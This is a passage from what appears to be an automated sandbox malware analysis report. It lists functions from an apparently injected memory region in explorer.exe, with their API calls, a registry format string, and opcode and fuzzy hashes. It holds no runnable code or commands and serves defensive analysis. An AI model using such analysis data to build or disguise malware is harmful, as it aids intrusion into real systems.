                                                          • RegGetValueW.ADVAPI32 ref: 029CC0A4
                                                          • LocalFree.KERNEL32 ref: 029CC0C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalValue$AllocFree_errno_invalid_parameter_noinfo
                                                          • String ID: SOFTWARE\%s
                                                          • API String ID: 2638254995-297323700
                                                          • Opcode ID: 71c37ed3956038e0c590f8db2717444fddfca14b2c905fad438fbe03bd42e23c
                                                          • Instruction ID: cdca7cce82166747d0c00df06a5aa3eb4b5b168d0fd86286a68ea33f0940f245
                                                          • Opcode Fuzzy Hash: 71c37ed3956038e0c590f8db2717444fddfca14b2c905fad438fbe03bd42e23c
                                                          • Instruction Fuzzy Hash: 0021F732208B8082EB20DB55F49475AB7B4F7C5794F600219EB9D47BA8DF7EC544CB40
                                                          Function 029E22F0 Relevance: 7.7, APIs: 5, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: und_memcpy
                                                          • String ID:
                                                          • API String ID: 2264155635-0
                                                          • Opcode ID: 3e92118c45d98eff3d9042c35d92e7570c4d1aaa52fb5718273506e7e9d721c2
                                                          • Instruction ID: 46ac144a154e52e79e0ced6603880ccf97cf6996a3907d0de9b11b71f455e58b
                                                          • Opcode Fuzzy Hash: 3e92118c45d98eff3d9042c35d92e7570c4d1aaa52fb5718273506e7e9d721c2
                                                          • Instruction Fuzzy Hash: 1F71BF7260A6C09ADBB0CB19E4907EBB7A1E7C9744F408026DACA87B58DF3CD5818F40
                                                          Function 029F44B0 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _fileno.LIBCMT ref: 029F44CB
                                                            • Part of subcall function 029F1CCC: _errno.LIBCMT ref: 029F1CD5
                                                            • Part of subcall function 029F1CCC: _invalid_parameter_noinfo.LIBCMT ref: 029F1CE0
                                                          • _errno.LIBCMT ref: 029F44DB
                                                          • _errno.LIBCMT ref: 029F44F9
                                                          • _isatty.LIBCMT ref: 029F455A
                                                          • _getbuf.LIBCMT ref: 029F4566
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                                                          • String ID:
                                                          • API String ID: 2574049805-0
                                                          • Opcode ID: defe3eddf12cd67e653a3cc3b043555c7ce62aaefbba4b41cea41ee78fca5da2
                                                          • Instruction ID: 77e1869e6d7ce45391a377f89dbeb2198f6a50a965236cabf2cf40b1d47dd640
                                                          • Opcode Fuzzy Hash: defe3eddf12cd67e653a3cc3b043555c7ce62aaefbba4b41cea41ee78fca5da2
                                                          • Instruction Fuzzy Hash: A641D7B271474086DBE8EF3DE44136A37A5EB84FA8F146225CB69473D8EB74C491C781
                                                          Function 029EB2C4 Relevance: 7.6, APIs: 5, Instructions: 115COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _fileno.LIBCMT ref: 029EB2E1
                                                            • Part of subcall function 029F1CCC: _errno.LIBCMT ref: 029F1CD5
                                                            • Part of subcall function 029F1CCC: _invalid_parameter_noinfo.LIBCMT ref: 029F1CE0
                                                          • _errno.LIBCMT ref: 029EB2F1
                                                          • _errno.LIBCMT ref: 029EB30D
                                                          • _isatty.LIBCMT ref: 029EB36E
                                                          • _getbuf.LIBCMT ref: 029EB37A
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                                                          • String ID:
                                                          • API String ID: 2574049805-0
                                                          • Opcode ID: 7de11f037516aaad5864b9fd072e1c791a7cefa466f71dd2d1a5169e14d227a2
                                                          • Instruction ID: 62daf14faf8d05611273bd6e5485c290b4c820ffe5af0c0b5c1421080c4ab1f9
                                                          • Opcode Fuzzy Hash: 7de11f037516aaad5864b9fd072e1c791a7cefa466f71dd2d1a5169e14d227a2
                                                          • Instruction Fuzzy Hash: 2741D172611B84CACF5A9F29D46132D3765FB94F9CF145216CBAA473E4EB38C491CB80
                                                          Function 029E5E90 Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                          • String ID:
                                                          • API String ID: 2166016019-0
                                                          • Opcode ID: 44b8f896a8d54861d44ac905f2f789a1a067f62a0f6920c99ad38e30146aa7d8
                                                          • Instruction ID: 380add0735825723ab1d528e1e7ca0a92a959b922aea54e8edd0f3054277b7c5
                                                          • Opcode Fuzzy Hash: 44b8f896a8d54861d44ac905f2f789a1a067f62a0f6920c99ad38e30146aa7d8
                                                          • Instruction Fuzzy Hash: 1A31C472128B40CBDB51DF15E44871ABBA4F786784F515925FA8A47B68CB7DC444CF02
                                                          Function 029E5FB0 Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                          • String ID:
                                                          • API String ID: 2166016019-0
                                                          • Opcode ID: 1c8f4f5f8584f980008812adca2767ac4d4628ddf13766fc1b0f856032cb8d40
                                                          • Instruction ID: c78d66db99239d0533b0716b570f357f84ba6ca23743f218b12566fbedf0d5bc
                                                          • Opcode Fuzzy Hash: 1c8f4f5f8584f980008812adca2767ac4d4628ddf13766fc1b0f856032cb8d40
                                                          • Instruction Fuzzy Hash: 6931E672218B50CBDB61CF16E44871ABBB8F796795F505115EB8A43B68CB7EC484CF01
                                                          Function 029F240C Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _FF_MSGBANNER.LIBCMT ref: 029F2433
                                                            • Part of subcall function 029F047C: _set_error_mode.LIBCMT ref: 029F0485
                                                            • Part of subcall function 029F047C: _set_error_mode.LIBCMT ref: 029F0494
                                                            • Part of subcall function 029F021C: _set_error_mode.LIBCMT ref: 029F0261
                                                            • Part of subcall function 029F021C: _set_error_mode.LIBCMT ref: 029F0272
                                                            • Part of subcall function 029EFE6C: ExitProcess.KERNEL32 ref: 029EFE7B
                                                            • Part of subcall function 029EFE6C: _amsg_exit.LIBCMT ref: 029F251E
                                                            • Part of subcall function 029F1F2C: malloc.LIBCMT ref: 029F1F57
                                                          • _errno.LIBCMT ref: 029F2475
                                                          • _lock.LIBCMT ref: 029F2489
                                                          • _errno.LIBCMT ref: 029F24B1
                                                          • RtlLeaveCriticalSection.NTDLL ref: 029F24D4
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _set_error_mode$_errno$CriticalExitLeaveProcessSection_amsg_exit_lockmalloc
                                                          • String ID:
                                                          • API String ID: 3065443017-0
                                                          • Opcode ID: 1828275573ebc62c42d9f9d2c8febade3a3f6dac99aeef9b9beab58eb6a996cd
                                                          • Instruction ID: 71b0857b55147518bb82847a6927c0b0549684d73d1c689e7093dc68374aff0b
                                                          • Opcode Fuzzy Hash: 1828275573ebc62c42d9f9d2c8febade3a3f6dac99aeef9b9beab58eb6a996cd
                                                          • Instruction Fuzzy Hash: 6011BE31B4564486EBD5BBA0E40832A736AE784B84F5554349B8E47B94CFBCC4408B61
                                                          Function 029F40A4 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __doserrno_errno
                                                          • String ID:
                                                          • API String ID: 921712934-0
                                                          • Opcode ID: 54d7f30ec2553d32a8f902d3909a3ca65a2760b7a04fd48234be5dc0ab105a37
                                                          • Instruction ID: c5ff71ec871600318bd36a54ededb5c4a15cca263cc7c811d09471ccaa07e4ca
                                                          • Opcode Fuzzy Hash: 54d7f30ec2553d32a8f902d3909a3ca65a2760b7a04fd48234be5dc0ab105a37
                                                          • Instruction Fuzzy Hash: CFF09072714B8889DF866F98C89036D2662ABF4F75F995716C73A0B7E0C77C8040CB12
                                                          Function 029EFC74 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _amsg_exit_getptd$_lock
                                                          • String ID:
                                                          • API String ID: 3670291111-0
                                                          • Opcode ID: b3205dcabc55d6ea5f0bdd4817164f66587d21cceeeb522c00df1f81cbeccfeb
                                                          • Instruction ID: b2f9b3be5b467a118138edc524db86c2b513d0874fd90207b444756fcb4585ef
                                                          • Opcode Fuzzy Hash: b3205dcabc55d6ea5f0bdd4817164f66587d21cceeeb522c00df1f81cbeccfeb
                                                          • Instruction Fuzzy Hash: D1F05E31712640C7EE99AB55C884BA82326FBD9B44F1C0236CF0A87790DF24D444CB11
                                                          Function 029E9E0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _errno_invalid_parameter_noinfo
                                                          • String ID: B
                                                          • API String ID: 2959964966-1255198513
                                                          • Opcode ID: 0a433b95e639ae02d84693d8af4ee103dc8925a725b6d2abd17b36db0ad37138
                                                          • Instruction ID: 1748d425653eef4e27ce55f7e0e47a7180e78ec935a8f4f81a78a43ce6434722
                                                          • Opcode Fuzzy Hash: 0a433b95e639ae02d84693d8af4ee103dc8925a725b6d2abd17b36db0ad37138
                                                          • Instruction Fuzzy Hash: D1218172B00A6489FF13EBB4EA407DC3775BB547A8F440619AF1B1AB98DB34C441CB10
                                                          Function 029EFE6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ExitProcess.KERNEL32 ref: 029EFE7B
                                                            • Part of subcall function 029F240C: _FF_MSGBANNER.LIBCMT ref: 029F2433
                                                          • _amsg_exit.LIBCMT ref: 029F251E
                                                            • Part of subcall function 029F01C8: _FF_MSGBANNER.LIBCMT ref: 029F01D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess_amsg_exit
                                                          • String ID: SOFTWARE\%s
                                                          • API String ID: 1096123818-297323700
                                                          • Opcode ID: d262c37b1be24b7bc313dda0774e6e74b9ba03732292cedb395a56bd372e88de
                                                          • Instruction ID: 16a3ca72999acbb96a540017679ee34dd0ca2974ee779b6d198ec63d6517707a
                                                          • Opcode Fuzzy Hash: d262c37b1be24b7bc313dda0774e6e74b9ba03732292cedb395a56bd372e88de
                                                          • Instruction Fuzzy Hash: 82F0E961F14644A6EBD8AF60E9A43782335EF88744F045035CF494B661CE38D4A9CB00